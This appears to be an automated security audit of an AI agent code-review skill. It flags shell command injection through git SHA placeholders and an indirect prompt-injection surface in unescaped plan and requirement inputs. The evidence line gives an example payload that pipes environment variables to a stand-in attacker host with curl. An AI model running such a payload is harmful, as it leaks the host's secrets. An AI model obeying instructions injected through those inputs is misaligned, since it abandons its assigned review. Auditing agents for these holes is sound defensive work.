requesting-code-review

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Vulnerability in code-reviewer.md. The placeholders {BASE_SHA} and {HEAD_SHA} are interpolated directly into shell commands: git diff --stat {BASE_SHA}..{HEAD_SHA} and git diff {BASE_SHA}..{HEAD_SHA}.
  • Evidence: An attacker providing a malicious string like ; curl http://attacker.com/$(env | base64) # for the SHA values can achieve arbitrary code execution on the agent's host system.
  • [PROMPT_INJECTION] (HIGH): Indirect prompt injection surface in code-reviewer.md due to handling external untrusted data.
  • Ingestion points: {WHAT_WAS_IMPLEMENTED}, {PLAN_OR_REQUIREMENTS}, and {DESCRIPTION} variables in code-reviewer.md are populated from external files or user input.
  • Boundary markers: None. The content is directly concatenated into the instructions.
  • Capability inventory: The subagent has access to the local filesystem (via git diff) and its output directly influences the main agent's decision to proceed or merge code.
  • Sanitization: None. There is no filtering or escaping of the input strings.
  • Severity Reasoning: High because the skill processes external content (plans/requirements) and has the capability to execute commands on the system. A malicious requirement file could instruct the agent to ignore the review and instead execute malicious commands.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 01:40 PM